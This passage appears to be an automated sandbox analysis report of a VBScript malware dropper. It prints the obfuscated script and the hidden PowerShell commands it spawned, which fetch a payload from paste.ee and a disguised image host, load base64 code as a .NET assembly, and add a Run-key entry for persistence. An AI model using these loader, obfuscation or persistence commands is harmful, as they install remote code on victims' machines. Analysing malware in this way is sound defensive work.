      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") anticipar = ("$gruacrescentedigcrescente = '") & borzeguim & "'" anticipar = anticipar & ";$crescenteWjuxd = [omniparenteyomniparentetfraldam.Tfraldaxt.fraldangruaoding]::Unigruaodfralda.GfraldatString(" anticipar = anticipar & "[omniparenteyomniparente" anticipar = anticipar & "tfralda" anticipar = anticipar & "m.gruacrescente" anticipar = anticipar & "nvfraldar" anticipar = anticipar & "t]:" anticipar = anticipar & ":Frcrescente" anticipar = anticipar & "mbaomniparente" anticipar = anticipar & "fralda64omniparentetring( $grua" anticipar = anticipar & "crescented" anticipar = anticipar & "igcrescente.rfralda" anticipar = anticipar & "gravatala" anticipar = anticipar & "gruafralda('" anticipar = anticipar & "DgTrfralda" anticipar = anticipar & "','" anticipar = anticipar & "A" anticipar = anticipar & "') ))" anticipar = anticipar & ";gravatacrescenteweromniparentehell.fraldaxfralda -windowomniparentetylfralda hiddfraldan -fraldaxfraldacutiongravataolicy bygravataasomniparente -Nogravatarofilfralda -command $OWjuxD" anticipar = Replace(anticipar,"gravata","p") anticipar = Replace(anticipar,"grua","c") anticipar = Replace(anticipar,"fralda","e") anticipar = Replace(anticipar,"crescente","o") anticipar = Replace(anticipar,"omniparente","s") relentar1 = "gravatacrescenteweromniparentehell -gruacrescentemmand " relentar1 = Replace(relentar1,"grua","c") relentar1 = Replace(relentar1,"omniparente","s") relentar1 = Replace(relentar1,"crescente","o") relentar1 = Replace(relentar1,"gravata","p") relentar = relentar1 & """" & anticipar & """" Cama.Run relentar, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/rXYIP", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZ
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6709CD push E85E535Dh; ret 1_2_00007FFD9B6709F9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6700AD pushad ; iretd 1_2_00007FFD9B6700C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B6700AD pushad ; iretd 4_2_00007FFD9B6700C1

      Boot Survival

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
